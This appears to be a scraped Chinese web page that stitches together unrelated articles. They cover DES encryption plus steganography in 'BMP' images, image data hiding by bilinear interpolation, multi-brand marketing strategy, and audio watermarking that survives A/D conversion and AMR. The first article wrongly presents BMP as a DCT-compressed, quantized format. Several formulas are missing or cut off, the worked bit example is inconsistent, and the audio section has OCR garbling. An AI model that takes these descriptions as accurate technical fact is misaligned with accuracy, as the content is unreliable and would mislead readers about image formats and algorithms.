信息隐藏是上世纪90年代开始兴起的信息安全新技术,并成为信息安全技术研究的热点。传统通信领域为了保证传递的信息能够不被窃听或破坏,常采用密码来保护信息,即让窃听者无法看到或听懂,但是这种技术的缺点是告诉窃听者这就是秘密信息,特别是随着计算机技术的发展,密码的安全性受到很大挑战。而新的信息隐藏技术是将需要传递的秘密信息,隐藏在一个普通的非秘密消息当中,再进行传输,这样即使窃听者窃听了传输的信息,也只会将其当成普通的消息,而不会怀疑或者无法得知是否有秘密信息的存在。

BMP是目前最常见的一种图像格式,采用BMP图像作为隐藏消息的载体具有许多优点。首先,BMP图像格式是互联网上图像传输的事实标准,使用这一图像格式比起其它格式来更不会引起怀疑。其次,BMP压缩造成的和秘密消息嵌入带来的图像质量退化是肉眼很难分辨的。为了更好地保证信息的安全性,本文把文件密码加密和信息隐藏这两种技术结合起来:首先利用DES(Data Encryption Standard)把信息文件进行加密,然后把加密后的文件通过选定的BMP图像以特定算法进行隐藏。

2 信息隐藏算法

信息隐藏把前面的加密信息隐藏在无关紧要的载体BMP图片中,第三方并不知道秘密通信这个事实的存在,也就是将秘密信息本身的存在藏起来,即使得到了载密对象,也看不到存在的秘密信息。

隐藏算法通过对BMP图像中选定的DCT系数进行微小变换,以满足特定的关系来表示一个比特的信息。在提取隐藏的信息时,根据隐藏的逆过程抽取比特信息。其特点是隐藏的数据量较少,但是其抵抗几何变换等攻击的能力较强。

在BMP编码中,量化过程是多对一的映射,它是有损变换过程,如果在量化前嵌入秘密消息,会丢失一些信息,从而导致解码时不能正确的获得秘密信息。因此,BMP图像的隐写算法的基本原理必须在量化后进行。由前所述,人眼对亮度信号比对色差信号更敏感,因此本工作将秘密消息与量化后的Y分量的DCT系数的LSB联系起来,从而达到嵌入和提取秘密信息的目的。

隐藏流程如图1所示,具体分为三步骤。

(1)对BMP图像的压缩数据进行解码,得到量化后的DCT系数。

(2)按照隐写算法的嵌入规则对Y分量的DCT系数进行修改,将要隐藏的秘密消息嵌入到其中。

① 首先对载体图像按照8×8的分块方式进行分块。如果载体图像的行数和列数的像素个数不为8的倍数时,则要进行边界扩充处理,使得行数和列数的像素个数都是8的倍数。设载体图像的行数为ImgHeight,列数为ImgWidth,Y在行和列方向上的采样率分别为SampRate_Y_H和SampRate_Y_V,则整幅图像被分为MCUNum = ImgWidth * ImgHeight / (64 * SampRate_Y_H * SampRate_Y_V)个小块。

② 读入待隐信息文件,把其转换为二进制的位流。设待隐信息文件的长度为FileLength。为了以后提取待隐信息,需要传递文件长度,用2个字节表示,可表示的最大数为65535。这样总的需要隐藏的信息长度 TotalFileLength = FileLength + 2,单位是字节。

③ 对一个MCU,按照对Y分量的DCT系数最低位进行修改。查找预定义的矩阵MIDBAND,该矩阵由数值0,1组成,对其中数值为1的位置修改对应DCT的频率系数:如果当前待隐信息的二进制值为0,则把相应位置的频率系数值的最低为修改为0;如果当前待隐信息的二进制值为1,则把相应位置的频率系数值的最低为修改为1。

④ 对待隐信息文件的二进制流按照③的隐藏方案进行信息隐藏。如果待隐信息文件长度大于载体图片的最大隐藏量,则把待隐信息文件按照最大隐藏量进行分段,然后分批按照隐藏流程处理。

(3)对修改后的DCT系数进行编码,重新生成压缩数据,即载密BMP图像。对于上面分批隐藏的,生成系列载密图像如图2所示。

秘密消息的提取过程是嵌入过程的逆过程,提取算法要和隐写算法相对应。

3 结束语

在网络飞速发展的今天,信息隐藏技术的研究具有现实意义。本文将DES加密技术与信息隐藏技术相融合,将加密后的信息隐藏到最常见的BMP图片中,使整个信息隐藏过程达到比较高的安全级别。信息隐藏技术在商业中的广泛应用,是一个跨多领域、多学科(数字信号处理、图像处理、模式识别、数字通信、多媒体技术、密码学、语音处理等)的技术体系,由于它与具体的应用密切相关,这也决定了信息隐藏技术研究成果的多样性以及信息隐藏技术研究的不完善性,仍有许多技术问题需要解决。但可以相信,随着科学技术越来越发达,信息隐藏将有更加广阔的发展空间。

参考文献

[1] 夏煜,郎荣玲,曹卫兵等.基于图像的信息隐藏检测算法和实现技术研究综述[J].计算机研究与发展,2004, 41(4):728-736.

[2] 陈波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程, 2005, 33(2):21-23.

[3] 陈雅.基于数字图像的信息隐藏技术综述[J].福建电脑,2008, (2):6-6.

[4] 刘强,方锦清,赵耿,李永.基于FPGA技术的混沌加密系统研究[J]. 物理学报,2012,61(13):130508.

第7篇

关键词:图像信息隐藏;双线性算法;奇偶层错位分块算法

中图分类号:TP309.7

本文主要探讨的是关于改进的双线性插值的图像信息隐藏算法在信息隐藏方面的应用,通过利用改进过的双线性算法对网络信息图像进行安全性保证,其中涉及到原理阐述、实例分析操作等内容。

1 基于改进的双线性插值的图像信息隐藏算法研究

1.1 双线性插值原理

基于改进的双线性插值的图像信息隐藏算法在对网络信息数据进行隐藏的具体操作中,根据改进的双线插值与邻近像素插值之间进行整合的途径达到对信息数据隐藏的目的,从而实现网络信息数据的安全性保护。具体应用原理是先通过把要处理的信息数据载体图像当作是已经进行了两倍放大处理的结果,这时候找到放大时候的插值点,该插值点即就是信息数据的嵌入点。通过利用改进后的双线性插值法作为信息重新插值的接入点,即能够为网络信息数据的隐藏提供更多的可利用空间。在此基础上,通过使用邻近像素之间的差值对网络信息数据进行隐藏处理,后面对于该网络信息数据的提取操作则是该隐藏操作的相反过程[1]。

1.2 信息隐藏操作步骤

对于需要进行安全藏的网络信息数据,通过对这写数据信息进行图像载体的处理,经过图像处理的这些载体我们记作A,对于该载体A进行安全藏处理可以分为五个具体的操作:

第一步:对要处理的图像A进行分块处理,分成连续不重叠的四块,把秘密图像的像素灰度值进行二进制转化,转化为相对应的二进制信息数据。

第二步:利用改进后的双线性插值途径对那些需要进行隐藏秘密信息数据的方块进行插值操作处理[2]。

第三步:对这些进行处理的像素处理块进行嵌入点的计算,计算出这些嵌入点与方块信息数据的基准点之间差值的绝对值d,如果计算出来的d绝对值超过了数值1的情况下,则可以对这些数据信息进行隐藏处理,反之则不能够对这些数据信息进行隐藏。对d绝对值的计算操作如表1所示,也就是首先要对水平方面的差值进行计算,然后才可以对垂直方向的差值进行计算,最后对斜方向上的差值大小进行计算[3]。

表1 差值计算具体顺序表

第四步:通过公式X=Pi/K,Y=Ri/K计算出数据信息中所有数据块中的嵌入点能够进行二进制信息的位数n,该n的具体计算公式如下:

n=log

第五步,对于前面已经找出来的秘密信息按照顺序找出n位的二进制具体数据信息,把这些二进制的数据信息转化为十进制数位的信息,再把这些十进制的数据信息和嵌入点的像素灰度进行相加计算处理[4]。

2 利用改进的双线性插值的图像信息隐藏算法实例

2.1 具体数据信息隐藏实例分析

选择其中一块数据信息作为分析实例,以第二块为例,这些秘密数据信息假设是11101010……,通过一定的顺序对这些数据信息进行隐藏处理,具体的隐藏操作过程的像素灰度值的变化情况如图1示,在该图中的S代表的是这些秘密处理信息数据。

12 14 13

13 10 14

18 16 14

图1 具体隐藏过程操作图

通过上面图形计算过程如下:

水平方向计算过程:首先对第二个像素块中水平方向上的数据信息进行计算,这时候计算出来的差值绝对值可以记作为d=4,然后对该数据信息进行隐藏容量额计算,计算出来的结果是n=3,这时候在对秘密信息进行选择,取出改秘密信息的前三位101,把这前三位数据转变为十进制的信息数据即也就是为5,在此基础上把通过十进位数据信息的处理方式把原来的秘密信息嵌入到载体图像中,这时候就可以得到数值13,对该数据信息进行隐藏处理后,再把载体图形的像素灰度值进行处理表示出来,最终表示为上面图形的形式,这时候原来的秘密信息就转化为了10101010……。

垂直方向计算过程:首先对第二个像素块中垂直方向上的数据信息进行计算,这时候计算出来的差值绝对值可以记作为d=1,然后对该数据信息进行隐藏容量计算,计算出来的结果是n=1,这时候在对秘密信息进行选择,取出改秘密信息的前一位1,把这前一位数据转变为十进制的信息数据即也就是为1,在此基础上把通过十进位数据信息的处理方式把原来的秘密信息嵌入到载体图像中,这时候就可以得到数值12,对该数据信息进行隐藏处理后,再把载体图形的像素灰度值进行处理表示出来,最终表示为上面图形的形式,这时候原来的秘密信息就转化为了010101……。

斜平方向计算过程:首先对第二个像素块中水平方向上的数据信息进行计算,这时候计算出来的差值绝对值可以记作为d=2,然后对该数据信息进行隐藏容量额计算,计算出来的结果是n=2,这时候在对秘密信息进行选择,取出改秘密信息的前两位01,把这前三位数据转变为十进制的信息数据即也就是为1,在此基础上把通过十进位数据信息的处理方式把原来的秘密信息嵌入到载体图像中,这时候就可以得到数值11,对该数据信息进行隐藏处理后,再把载体图形的像素灰度值进行处理表示出来,最终表示为上面图形的形式,这时候原来的秘密信息就转化为了0101……。

到此为止,已经对四块数据信息的像素块的秘密信息进行了嵌入处理,一共是对6位数据信息进行了隐藏处理,其中剩下的秘密数据信息通过同样的计算处理方法进行顺序性的嵌入,直到最后所有的数据信息都进行了嵌入处理,实现安全隐藏操作的完成。

2.2 信息隐藏实例结果分析

基于改进的双线性插值方法对图像信息进行隐藏的过程中,首先需要对隐藏结果进行监测,选择网络中图库中的一幅图片进行检测,首先要对这些图片按照512*512的灰度要求进行处理,经过处理后的图片再作为载体图像进行检测实验操作,然后通过使用分辨率在130*130的Lena图像作为该隐藏信息操作的秘密图像,这时候利用改进的双线性插值方法对这个需要隐藏的图像进行隐藏处理,这时候会发现隐藏后的图像展现出了比较好的视觉效果。

3 结束语

对于网络信息数据的安全性进行研究是保障网络安全性的重要前提,本文通通过利用双线性插值方法对图像数据进行安全藏处理方面的内容进行分析,从应用原理、操作过程、结果检测等方面进行了研究,同时还列举了模块进行案例分析,但是关于双线性插值方法对图像数据进行安全藏方面的应用还需要在实践中进行进一步的探索。

参考文献:

[1]TUmerLF.Digitaldatasecuritysystem.PatentIPNWO89/089151,2011.

[2]BenderW,Gruh1D,MorimotoN,LuA.Techniquesfordatahiding.IBMSystem Joumal,2012.

[3]姜楠.信息隐藏和隐藏分析的理论与算法研究[D].北京邮电大学博士论文,2011.

第8篇

多品牌策略就是给每一种产品冠以一个品牌名称,或是给每一类产品冠以一个品牌名称。多品牌策略主要包括两种情况:一是在不同的目标市场上,对同种产品分别使用不同的品牌;二是在同一市场上,对某种产品同时或连续使用不同的品牌。例如,宝洁公司在中国推出了四个品牌洗发水:海飞丝、飘柔、潘婷、沙宣,每一品牌都以基本功能以上的某一特殊功能为诉求点,吸引着不同需要的消费者。希望自己“免去头屑烦恼”的人会选择海飞丝;希望自己头发“营养、乌黑亮泽”的人会选择潘婷;希望自己头发“舒爽、柔顺、飘逸潇洒”的人会选择飘柔;希望自己头发“保湿、富有弹性”的人会选择沙宣。

二、多品牌策略的优点

多品牌策略在实践中屡见不鲜,多品牌策略的优点很多,主要有:

(一)多品牌具有较强的灵活性。没有一种产品是十全十美的,也没有一个市场是无懈可击的。浩瀚的市场海洋,为企业提供了许多平等竞争的机会,关键在于企业能否及时抓住机遇,在市场上抢占一席之地。见缝插针就是多品牌灵活性的一种具体表现。

(二)多品牌能充分适应市场的差异性。消费者的需求是千差万别的、复杂多样的,不同的地区有不同的风俗习惯;不同的时间有不同的审美观念;不同的人有不同的爱好追求,等等。

(三)多品牌有利于提高产品的市场占有率。多品牌策略最大的优势便是通过给每一品牌进行准确定位,从而有效地占领各个细分市场。如果企业原先单一目标顾客范围较窄,难以满足扩大市场份额的需要,此时可以考虑推出不同档次的品牌,采取不同的价格水平,形成不同的品牌形象,以抓住不同偏好的消费者。

多品牌策略不仅仅是企业满足消费需求的被动选择,也是企业制定竞争战略的主动选择。对市场攻击者和挑战者而言,其抢占市场的一个惯用伎俩就是发展出一个专门针对某一细分市场的品牌来逐渐蚕食;对市场领导者而言,与其坐等对手来占据某一细分市场,不如自己先发展出一个品牌去抢占,实施有效防御,从而锁定不同目标消费群。

三、多品牌策略的不足

当然,每个策略都不是完美的,多品牌策略也存在着缺陷,企业若在同一市场中发展多个品牌,成本成长的速度会比收入还快,在零售商与内部资源分配上,也会遇上复杂的管理难题。在推出一项品牌之前,企业通常会比较它们预期会产生的额外收入以及行销该品牌的成本。这类成本通常超乎主管的想像,因为“多品牌”策略有一项严重的限制;它会因不具规模经济而受害。一家公司会因在一个市场中推出数个品牌,而招致隐藏的成本,而且在事情发展超过某一点之后,就会有绑手绑脚之苦。

尽管隐藏成本的累积速度相当缓慢,但如果公司将太多品牌塞入这个产品类别,隐藏的成本就出现了。隐藏成本有四种可能呈现方式:

(一)成本重叠。当企业无法透过独一无二的方式为每一个品牌进行定位时,成本就会攀升。通常,品牌会在特色、属性或价格方面出现重叠,只是企业主管未意识到罢了。这些品牌彼此竞争的程度,和它们与对手品牌之间的竞争程度不相上下,而且最后通常演变为彼此互相吞噬。如此一来,公司成本的上升速度会比收入成长速度还快。

(二)效率不彰。很多公司已经运用自己的品牌开创出几项显然有利可图、但规模很小的利基。缺乏数量上的优势并未让他们的行销人员担心,因为他们力图达成的是整个品牌组合的销售最大化,而不是个别品牌的销售最大化。但是,这类的公司迟迟才了解,维持一大群品牌(而且每项品牌的运营规模都相对较小)的成本,相对而言,比推销几项大品牌的成本要高。例如,要制造各式各样的产品,工产方面需要大量的装备成本以及较长的机器停工时间,从而会导致较高的生产成本。

(三)零售商利润高昂。当企业推出多项品牌时,要为这些品牌取得零售上架空间,上架成本会高得让你不得不打退堂鼓。大型零售厂商,如美国的沃尔玛百货与欧洲的家乐福,一般在每项产品分类中只将前两大或前十大品牌上架。零售商运用领导品牌吸引顾客上门,但随后就向购物者推销自有品牌。

(四)管理难度加大。“多品牌”策略需要进行协调,包括从产品创新与包装改变,到经销商关系与零售商促销的。大型的品牌组合也需要经常进行价格变动与库存调整,这些工作会消耗所费不赀的管理资源。

此外,品牌扩增为企业带来最大成本的时候,不是现在,而是在未来。那些在市场中具有大型品牌组合的公司,经理人不断挂念在心的,往往是品牌之间的经费配置,而不是公司前途或有关竞争对手的问题。这类冲突的阴影常使企业组织挥之不去,让他们在面临更加专注的对手竞争时,显得脆弱不堪。

四、多品牌策略的应用

(一)明确品牌定位。定位意味着牺牲,意味着有所不为,而企业的扩张又希望无所不为。企业在完成资本积累开始对外扩张的过程中,若坚持统一品牌策略,让所有开发的新产品都套用原品牌,就会面临两难选择:若进行品牌延伸,尽管极为谨慎行事,采取了防范措施,但也可能出现品牌形象淡化、每一种产品都缺乏个性而被对手各个击破的风险;若放弃某些领域的品牌延伸,则意味着必须放弃一部分市场。要解决这一难题,一个可行的办法就是要采取产品定位的多品牌策略。

(二)建立内在相关性。品牌管理涉及到采购、生产、营销、财务、人力等各个环节。对多品牌企业而言,不能只关注单个品牌,而必须注意同一系列品牌之间的相互关联和影响。内在相关性主要是指,在实施多品牌策略时必须能够在几个品牌之间形成良好的资源整合和共享机制。任何一个企业的资源和精力都是有限的,因此为了充分利用企业的内外资源,可以成立完善的研发、采购公共平台,同时在渠道资源方面也实现良好的品牌互动和共享,并以完全不同的渠道策略来实现品牌间的良性竞争。品牌之间的高效整合与共享是欧莱雅取得成功的关键,其主要体现在技术和渠道这两个兼容性极强的方面。在技术方面,欧莱雅尽量发挥技术平台的相关效应。

(三)发挥企业品牌对多品牌策略的杠杆作用。多品牌策略中,品牌关系的管理还包括企业品牌和产品品牌之间关系的管理。企业品牌用于维护企业整体形象,对现有和潜在的员工来说,它是一种激励;对投资者而言,它意味着信心;对于产品品牌,它提供的是承诺。企业品牌代表的是企业的外部形象,对产品品牌有很强的杠杆作用。欧莱雅深知企业品牌的重要性,将其营销推广跨越个别产品线的产品品牌宣传,将光芒聚焦到企业品牌上来,最终形成一股激化不同产品品牌的能量。

综上所述,企业要使用多品牌策略进行市场竞争,需要注意多方面的内容。首先在品牌定位时要注意各品牌之间的关系,使各个品牌互相不冲突,并且协调各个品牌之间的内在关系,找出重点培育的品牌,以重点品牌促进其他品牌的发展,同时又需要防止那些做得不成功的品牌影响重点品牌的价值。在培育各个品牌的同时注意隐藏成本的增加,尽量减少隐藏成本,避免因为隐藏成本拖垮了各个品牌的扩张,做到了这些才能使企业的多个品牌健康地发展,使企业在竞争中获胜。

论文关键词:多品牌;品牌定位;品牌关系

论文提要单一品牌已越来越难以满足消费者的需求,实施多品牌策略成为众多企业竞争市场的手段。本文分析多品牌策略的概念、优点和缺点、使用范围、实践应用,希望对企业的品牌决策提供帮助。

主要参考文献:

[1]巨天中.品牌战略.中国经济出版社,2004.5.

第9篇

    论文摘要:提出了一种基于小波分解和倒谱技术的音频数字水印算法,该算法通过对原始音频进行小波多级分解,从中选取低频系数进行倒谱变换。通过统计均值的计算和调整方法设计,完成了水印的嵌入。实验结果表明该算法能够有效地抵抗a/d和d/a攻击,误码率为o,隐藏容量较大。同时,本算法还能够抵抗一定的amr攻击,为手机音频的安全传播和管理提供了新的前景。

论文关键词:音频水印;小波变换;倒谱;模/数转换;amr格式

0引言

在电视广播、交通台和音乐会等公共信息传播领域,音频的版权管理和安全传输都非常重要。如果采用数字水印技术,则需要水印算法能够抵抗a/d和d/a转换。目前,具有这种变换的类型可以划分为三种。第种是基于电缆传输方式,以电话线传播和直通电缆连接为典型,所受干扰小。电话线方式是公用信道,能够传播很远,传输秘密水印的载体可以是话音或音乐等类型;而直通电缆方式一般在一个办公实验的局部环境中。第二种是基于广播方式,通过广播媒体或专用频道进行传播。第三种是基于空气直接传播方式,会遭遇各种干扰,通常只能近距离设计。由于音频水印的远程传输和提取具有广泛的应用价值,这些音频传播水印技术在国外已经受到了极大重视并有所成果。在空气传播水印信息方面,德国的steinebach等人…开展了最早的研究,通过设定5—4oocm的多个不同间距,同时使用了4种不同的麦克风,研究了5种音频类型的水印技术,在5~180cm的间距普遍获得了良好的提取效果。随后,日本的achibana等人口研究将水印实时地隐藏到公共环境如音乐演奏会的音乐之中,能够成功地在一个30s音乐片段内隐藏64b的消息,测试的空气传播距离为3m。在电话网络传播方面,加拿大的chen等人开展了模拟电话通道的隐藏,在误码率小于0.001时,其数据带宽达到了265bps。日本的modegi等人设计了一套非接触水印提取方案,通过手机来广播或转存水印音频,然后,通过计算机将秘密从转存的音频文件提取出来。隐藏带宽达到61.5bps,提取率高于90%。但是,这几种研究结果并没有对算法做详细描述。在直通电缆传播方面,项世军等人采用了三段能量比值方法,嵌人的是一串32b信息,虽然提取效果比较好,但由于实验容量太小,实用性不够,且对同步技术有较高的要求;王让定等人采用改进的量化方法、马冀平等人”采用了dct方法,嵌入的都是小图片,但提取效果一般,仅可辨认。雷贽等人在短波广播含水印音频算法方面取得了可喜的进展,通过多种同步方案和算法设计,使水印提取的模拟和实测过程都达到了较好的效果,但实验容量很小。此外,由守杰等人设计了一种相似度计算方法,由于是非盲提取,不适于广播通信领域。作者利用小分段的直方图特性,开展了抗a/d转换的音频水印初步研究,在每段开头总能获得正确提取,但在每段的后续隐藏效果不佳,还需要做许多改进。

可见,在面向公共音频传播方面,如何既能提高隐藏效果又能增大容量,仍然是音频水印算法要解决的一个难题。本文通过数据特性分析,采用倒谱技术和小波分解方法,成功地解决了问题,且能够抵抗一定的手机彩铃amr攻击,为实用化提供了重要基础。

1数据特性描述

音频信号经过具有a/d和d/a转换的传输过程时,必然要涉及到以下问题:

1)音频信号要经历传输过程中的外加干扰,包括50hz的工频电信号,因此,需要选择大于50hz的音频频率信号;

2)因声卡特性不同,音频转换过程不一定具有线性模型;

3)传输中录制的音量往往与播放的音量不一致,这要求水印算法能够抵抗音量的大范围变化;

4)传输中录制开始时刻可能早于也可能晚于播放时刻而且结束时刻也不一定一致,所以水印隐藏的起始位置需要没置标志;

5)转换过程具有一定的滤波特点,可滤除较高频率信号。

1.1音频频率范围选择

对照音频频率响应特性图可以发现,在低频部分的阈值比2khz~4khz的要高得多,不容易察觉;尤其是1khz以下部分,其不可感知性要好得多。文献[4]的实验也表明,音频数据通过a/d和d/a转换后,其低频范围700hz以下的损失非常小。可见,选择在频率为(50,700)范围内的音频数据,用于信息隐藏非常有利。

1.2倒谱系数的选取方法

倒谱变换在音频水印中已经具有了较强的健壮性,能够抵抗噪声、重采样、低通滤波、重量化和音频格式转换等常见攻击。倒谱变换后的数据特征表现为:倒谱系数在中间部分的差异很小,而在两端的变化很大。

图1是对音频进行7级小波分解后,选取5~7级高频数据部分进行倒谱变换情形。在进行统计处理时,如果让全部数据参与,则计算结果在隐藏前后有明显变化;如果不考虑两侧若干个大数据,仅以中间大部分数据参与运算,则计算结果容易保持在一个稳定范围内。

进一步,如果将计算的均值移除,即相当于此时的均值为0。然后,在0的上下两边产生一个偏差,如2,以分别隐藏比特信息“1”和“0”。则在提取时,只需要判断所求均值是否大于0,就可以求得水印比特。这种方法,称之为“数据分离调整”技术。

2算法分析与设计 

2.1隐藏算法流程设计

将原始音频分段时,段数至少是水印比特数。然后,对每段数据进行小波分解,取其低频系数进行倒谱变换,采用前述的数据分离调整技术,以实现水印比特嵌入。之后,先后重组倒谱系数和小波系数,获得含有水印信息的音频段,从而构造为新的音频。该算法流程如图2所示。

为了增强可靠性,对水印信息先做纠错处理,采用bch编码方法。算法的主要工作是寻找合理的参数优化配置,使隐藏效果达到最优。参数主要有:小波分解级数、分段的数据帧长度、数据帧的间距、上下分离的阈值将数据帧的间距设置为数据帧长度的倍数,最大为1,最小为0。期间选择多个系数,结果发现都可以成功实现隐藏。

2.2水印嵌入算法设计

1)水印信息处理。

音频载体分段数至少应该大于,才能满足隐藏要求。

假设每段长为,该段经过小波变换的级分解后,各级小波系数长度分别为:

取低频系数部分,使之频率范围位于(50,l000)内,则需要构造一个组合的低频小波系数集合。以8khz音频为例,实施7级小波分解后,所选择的低频系数部分为:

p的长度非常重要。如果太小了,对隐藏不利;反之,就需要更长的音频载体。所以,音频分段与小波分解具有密切的关系。

3)倒谱变换。

复倒谱变换对于信号序列的均值大于或等于0时,其逆变换可逆;否则不可逆。为此,需要计算指定段信号的均值,若均值小于0则取反。然后对所有指定段进行复倒谱变换。

4)倒谱系数的选取。

去掉首尾波动很大的部分,而选择中间平稳的部分嵌入水印。假设两端各去掉l0个数据,则实际用于隐藏水印的倒谱系数长度为:

5)去均值化处理。

计算剩余部分的均值,然后用每一个倒谱系数减去该均值,得到倒谱系数的相对值。 

6)嵌入水印。

给定一个阈值t,采用整体上下拉开的思路,对以上的相对倒谱系数进行修改,得到最终的倒谱系数,从而实现水印的嵌入。

7)重构音频信号。

对嵌入水印的段重构后,实施复倒谱反变换。然后进行小波重构,从而得到含有水印比特的音频段。将所有这些段重构,就获得了含全部水印信息的音频。

2.3水印提取

水印提取过程的前半部分与嵌入过程是一样。在提取出比特序列后,再经过bch解码处理,从而得到隐藏的水印比特序列。水印提取的流程如图3所示。

对获得的倒谱系数去两侧数据,计算剩下的倒谱系数平均值。按照以下规则进行隐藏信息的提取:

在信息传播方面.针对a/d和d/a传播采用『_直通电缆的传输方式,在单机上用电缆将音频输入输出口相连。传输线为音频线1.8m和延长线1.8m,共3.6m。此外,针对手机彩铃传播采用了amr方式。隐藏水印设计了三种方案,如图4所示。

小容量的便于amr处理,大容量的便于实用化。

仿真工具为matlab7.2.使用windowsmediapldrver播放器播放音频载体,使用cooledit pro工具进行录音、编辑和攻击处理。

基本参数选择为:选用harr小波进行7级小波分解后,按照式(4)选取低频系数区域,所得频段在77.5~5o0hz范围。式(7)中的为l0,式(9)中t值的合适范围在0.005~0.025中实验选取。式(3)中的取值为3200非常合适,此时,实际参与计算均值的数据为155。

3.2音频载体的影响

音频载体选择了三种,如表1所示,  

其采样频率8khz,样本精度为16b,单声道,段的长度为3200。音频转换为8khz的目的是为了今后在电话网上的隐蔽传输,并可以转化为amr文件,传输到手机中,成为手机彩铃的版权管理目的。

经过a/d和d/a传播后,4×4水印提取的误码情况如表1所示。可见,载体的选用非常重要;同时,从音频质量上考虑,选用较小的t值更有利于保证信噪比。所以,以下的实验采用的是“奥运主题歌”。

3.3阈值参数的合理计算

选择了水印“北”进行比较测试,如图5所示。结果表明,在t值为0.016时,误码率为0,效果最佳。为此,后续实验也采用该值。

3.4大容量a/d和d/a传输

采用图像水印“北京”进行大容量测试,音频载体选用“奥运主题歌”。图6为经过a/d和d/a转换前后的数据均值计算对比情况.共有bch编码的555个数据。按照式(10)

提取后,能够完全正确提取,且误码率为0。进一步,将本文算法的实验效果与已有属于盲提取的研究结果相比较,如表2所示。

可见,本文算法虽然带宽小,但水印能够正确提取,而且嵌入容量较大。由于实验中使用了8khz的音频载体,能够广泛应用于语音传输和手机彩铃等场合,所以在电话网络广播方面的实用性强。

3.5抗amr转换

随着手机彩铃的普遍使用,彩铃的安全传播和管理将成为新的问题。本算法在这方面也开展了新的尝试,将水印隐藏在彩铃中,可以起到版权保护或秘密信息传播的作用。

目前手机录音放音格式多数是amr格式,要求算法能够抵抗amr转换攻击。在上述的音频载体中成功完成水印嵌入后,需要将采样精度l6b、采样频率为8000的波形音频转换为amr格式,就可以存入手机中使用或发送给他人。提取时,先将amr文件转换为wav格式,然后再提取水印信息。

amr转换工具为miks0ftmobiieamr convener,可以进行wave与amr两种格式的相互转换。实验中使用的水印信息为图4(a)水印,采用bch(31,16,3),闽值设置为0.0195时,b脒达到0,取得了满意的效果。

相关文章